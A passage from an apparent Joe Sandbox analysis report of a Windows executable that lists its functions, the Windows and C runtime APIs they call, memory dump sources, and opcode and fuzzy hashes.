                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 089c6e71d264f132ff9ed3eec5d561d50a86a7cd7d02d2a8dba92d2b8920d1ae
                                                            • Instruction ID: 92edafd730ae6a847d3a93831da65861494a165fb71bd8c34afa7e47e31d4443
                                                            • Opcode Fuzzy Hash: 089c6e71d264f132ff9ed3eec5d561d50a86a7cd7d02d2a8dba92d2b8920d1ae
                                                            • Instruction Fuzzy Hash: 6521F8B1E40211AFDB14EF75CC466AB76A8FF05359F04013AEA05EB682E7749944C7A8
                                                            Function 0005C133 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 0005C138
                                                              • Part of subcall function 000413F8: __EH_prolog.LIBCMT ref: 000413FD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 87384f4930bca90184c027db392b5512f5263e8b3ce9a722641ed051b2266a26
                                                            • Instruction ID: ff5757366f52103f1f37543bd2147a73d163f879c6a37549cb2cf987a898e904
                                                            • Opcode Fuzzy Hash: 87384f4930bca90184c027db392b5512f5263e8b3ce9a722641ed051b2266a26
                                                            • Instruction Fuzzy Hash: 8B216BB1D04719AEDF25EF94CC41AEEB7B4BF05305F0004AAE809A7243D778AA49DB64
                                                            Function 0006BCA8 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0006BD08
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID:
                                                            • API String ID: 190572456-0
                                                            • Opcode ID: a5ffe1e709a8f7286b996e35a5a25b40f75a4ae8f3932e7098c08af4ab98bc9c
                                                            • Instruction ID: 384fafb4b6371f784c762234c96ba98c6ae05ae299716f2f457aca08efa7f353
                                                            • Opcode Fuzzy Hash: a5ffe1e709a8f7286b996e35a5a25b40f75a4ae8f3932e7098c08af4ab98bc9c
                                                            • Instruction Fuzzy Hash: D511A377A00535AFEBA19E28EC408AE73D7EF853207164220ED55EF254EB34ED818BD1
                                                            Function 0004A453 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: fb4efc45cbdb386ecaa45ab8832f3067ad289654c9fa8152181ed8c34d69cdca
                                                            • Instruction ID: 524e4227cfa02c4748b4d9e30009688e0ab5480cb220c1778469d2f3a2b4330f
                                                            • Opcode Fuzzy Hash: fb4efc45cbdb386ecaa45ab8832f3067ad289654c9fa8152181ed8c34d69cdca
                                                            • Instruction Fuzzy Hash: 0711E3B6A405259BCB21EF68C885AFF73B5AFC5710F014139F815A7242CB749D0087A9
                                                            Function 0005EA22 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 0005EA27
                                                              • Part of subcall function 0005195C: _wcslen.LIBCMT ref: 00051972
                                                              • Part of subcall function 00048803: __EH_prolog.LIBCMT ref: 00048808
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: H_prolog$_wcslen
                                                            • String ID:
                                                            • API String ID: 2838827086-0
                                                            • Opcode ID: 07702a7eb0b2423fa2d9a679f5942c62837419477f6421a037a723850621074a
                                                            • Instruction ID: 4132da07c2ee82429ab8047c56fd8f15fb3a7fafd8b15754c7deda3c099f1153
                                                            • Opcode Fuzzy Hash: 07702a7eb0b2423fa2d9a679f5942c62837419477f6421a037a723850621074a
                                                            • Instruction Fuzzy Hash: 1E11E7719052849EFB01EB68EC1ABDD3BA4EB15310F00806FF64896293DFBD1644DB66
                                                            Function 0006D489 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0006C146: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0006A393,00000001,00000364,?,0006524D,?,?,000830C4), ref: 0006C187
                                                            • _free.LIBCMT ref: 0006D4F5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap_free
                                                            • String ID:
                                                            • API String ID: 614378929-0
                                                            • Opcode ID: 7d30b6ea8507d2c13b34e354a80f4644266152c8881b27fa68bdf41323802f68
                                                            • Instruction ID: 776a4cd6d0c28380478f4ac445f4b0588fce94f8c94958199657b8b126ca2937
                                                            • Opcode Fuzzy Hash: 7d30b6ea8507d2c13b34e354a80f4644266152c8881b27fa68bdf41323802f68
                                                            • Instruction Fuzzy Hash: 4001DB726003055BE3218F69DC8595AFBDAEBC5370F25052EE59493281EE30AD058674
                                                            Function 0006C146 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0006A393,00000001,00000364,?,0006524D,?,?,000830C4), ref: 0006C187
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 0c3478c341af57181168bd18b78636c6df3bbfec99a0a582db0b99136b7ec245
                                                            • Instruction ID: 38cc6d58f940fefe1492f6cc14a0d1e730404526398888d705ee022b46042b07
                                                            • Opcode Fuzzy Hash: 0c3478c341af57181168bd18b78636c6df3bbfec99a0a582db0b99136b7ec245
                                                            • Instruction Fuzzy Hash: CCF0BE316056246AFB616A62AC05EBA37CAAF83760B554121F88DAF193CB70DD0286E0
                                                            Function 0006A64E Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,?,000653E4,?,0000015D,?,?,?,?,000668C0,000000FF,00000000,?,?), ref: 0006A680
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 4708159aa7deefb9df1ea858d760aa8628d8bb1e5862cb3dc9cbd658b05e4844
                                                            • Instruction ID: a2275ebc592283a13bc25c7d8cc33989134ca7c451833f7208e517e383b5b1b0
                                                            • Opcode Fuzzy Hash: 4708159aa7deefb9df1ea858d760aa8628d8bb1e5862cb3dc9cbd658b05e4844
                                                            • Instruction Fuzzy Hash: 9AE0A02530062156E7713625DC00B9B2A8EDB433A0B1E0211B805B60D2CB69DC0189B3
                                                            Function 0004A860 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,0004A81B,?,?,?,?,?,0007365F,000000FF), ref: 0004A87B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: ChangeCloseFindNotification
                                                            • String ID:
                                                            • API String ID: 2591292051-0
                                                            • Opcode ID: a43142930138965c35b576fe4567fd011ec2347cf611772d46d6323b547bddb7
                                                            • Instruction ID: 2b8067e0556167e12bec7be6257cba4ffc11dcda1012f26e8873fc02f804ed70
                                                            • Opcode Fuzzy Hash: a43142930138965c35b576fe4567fd011ec2347cf611772d46d6323b547bddb7
                                                            • Instruction Fuzzy Hash: 62F0BEB05C5B058EEB34AA24C448792B3E4AB12325F441B2EC0E6429E0DB69A98E8A45
                                                            Function 0004B946 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0004BA74: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0004B96B,000000FF,?,?), ref: 0004BA9D
                                                              • Part of subcall function 0004BA74: FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,0004B96B,000000FF,?,?), ref: 0004BACB
                                                              • Part of subcall function 0004BA74: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0004B96B,000000FF,?,?), ref: 0004BAD7
                                                            • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0004B971
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: Find$FileFirst$CloseErrorLast
                                                            • String ID:
                                                            • API String ID: 1464966427-0
                                                            • Opcode ID: 482db70c6ab80a52583f809b2def75759157f394b1c8a1f8010fdfc4c3eb3298
                                                            • Instruction ID: 3b58e688d93ffc2dee71a0bbdf9e28188b8f4b1b412f6bf35b4d82c2232463e6
                                                            • Opcode Fuzzy Hash: 482db70c6ab80a52583f809b2def75759157f394b1c8a1f8010fdfc4c3eb3298
                                                            • Instruction Fuzzy Hash: 9DF082714097D0ABCB622BB88804BDBBBD05F5A335F008A59F6FD12293C7749494972B
                                                            Function 00052101 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetThreadExecutionState.KERNEL32(00000001), ref: 00052136
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: ExecutionStateThread
                                                            • String ID:
                                                            • API String ID: 2211380416-0
                                                            • Opcode ID: 7f40d859bd234f80022cb5f699a2ab7391188bef49e7731dba44159566cc287a
                                                            • Instruction ID: ded242a5d92220c0e553cb76236965636a4bcfab7e0550d103a0a454f2148799
                                                            • Opcode Fuzzy Hash: 7f40d859bd234f80022cb5f699a2ab7391188bef49e7731dba44159566cc287a
                                                            • Instruction Fuzzy Hash: 7DD0C211A0445055E616732868067FF29479FE3315F090065F988161D38B5C084A86E5
                                                            Function 0005B606 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GdipAlloc.GDIPLUS(00000010), ref: 0005B60C
                                                              • Part of subcall function 0005B398: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0005B3B9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: Gdip$AllocBitmapCreateFromStream
                                                            • String ID:
                                                            • API String ID: 1915507550-0
                                                            • Opcode ID: c2cb9628ddc588ae09f0783494310dd7df1c6caa713ae07bdab044bdc10b0755
                                                            • Instruction ID: 47c56331f7bca74040c39fba2ff2c88751b1cc435fbfca777ab12bbc337edb92
                                                            • Opcode Fuzzy Hash: c2cb9628ddc588ae09f0783494310dd7df1c6caa713ae07bdab044bdc10b0755
                                                            • Instruction Fuzzy Hash: 82D0A730200309B6EF412B20CC02DBFB994DB40341F008131BC0195181EBF5ED145551
                                                            Function 0005F595 Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • DloadProtectSection.DELAYIMP ref: 0005F5BD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: DloadProtectSection
                                                            • String ID:
                                                            • API String ID: 2203082970-0
                                                            • Opcode ID: 8d95f69f2fece956cc832165f32a16eeb18d3cfd581f8440817dd81407880d5d
                                                            • Instruction ID: e037a328d0e965b6be582bfd6af18c3ec415aec01f7e4d16f6ad89f3fe290ea4
                                                            • Opcode Fuzzy Hash: 8d95f69f2fece956cc832165f32a16eeb18d3cfd581f8440817dd81407880d5d
                                                            • Instruction Fuzzy Hash: 07D0C970504A06C9E255ABA4AC467BB62E0B709746B800821FA46D61A1EB6C494DC611
                                                            Function 0005ED3D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00052E58), ref: 0005ED62
                                                              • Part of subcall function 0005C5F8: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0005C609
                                                              • Part of subcall function 0005C5F8: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0005C61A
                                                              • Part of subcall function 0005C5F8: IsDialogMessageW.USER32(0001046C,?), ref: 0005C62E
                                                              • Part of subcall function 0005C5F8: TranslateMessage.USER32(?), ref: 0005C63C
                                                              • Part of subcall function 0005C5F8: DispatchMessageW.USER32(?), ref: 0005C646
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                            • String ID:
                                                            • API String ID: 897784432-0
                                                            • Opcode ID: fa2e77c8143f63b7af7813375aca2f74a4f3a20c3df0ba8daef798fc7494621e
                                                            • Instruction ID: 7cbae323970688a0fd5f5907c6ee515338b6267fd2c50e9e10704c3b2584d346
                                                            • Opcode Fuzzy Hash: fa2e77c8143f63b7af7813375aca2f74a4f3a20c3df0ba8daef798fc7494621e
                                                            • Instruction Fuzzy Hash: 66D09E71144700BAEA012B51DD06F5B7AE2BBC9B05F004555B785340B286669E619B02
                                                            Function 0004AAFC Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileType.KERNELBASE(000000FF,0004A9FE), ref: 0004AB08
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: FileType
                                                            • String ID:
                                                            • API String ID: 3081899298-0
                                                            • Opcode ID: 2ffa19c8a6e5b39bcaa9af25c7f452cd755258127f40246df225d092ad241568
                                                            • Instruction ID: fea743b14bbbd0bba77148ae07ed7051e2e756fef209698023e2eeaec8b0d089
                                                            • Opcode Fuzzy Hash: 2ffa19c8a6e5b39bcaa9af25c7f452cd755258127f40246df225d092ad241568
                                                            • Instruction Fuzzy Hash: D9C08074548105854EB00E34D8490567753FB533B57B4C3F4C168C90A3C3378C87E597
                                                            Function 0005F1AB Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F1BD
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 3d87f8dd4fdabd02fde2075be7ece30673d4f5e3d398f8a03749bf2d2dcf21cc
                                                            • Instruction ID: 72321ff5c785c66e35dac614281c4314e28b1e35db5a38b0001a3de067ae09f0
                                                            • Opcode Fuzzy Hash: 3d87f8dd4fdabd02fde2075be7ece30673d4f5e3d398f8a03749bf2d2dcf21cc
                                                            • Instruction Fuzzy Hash: 3AB092A6258902AC62041250AC0683F0228C781B12320883ABC1184082A9484C0A5036
                                                            Function 0005F1C6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F1BD
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
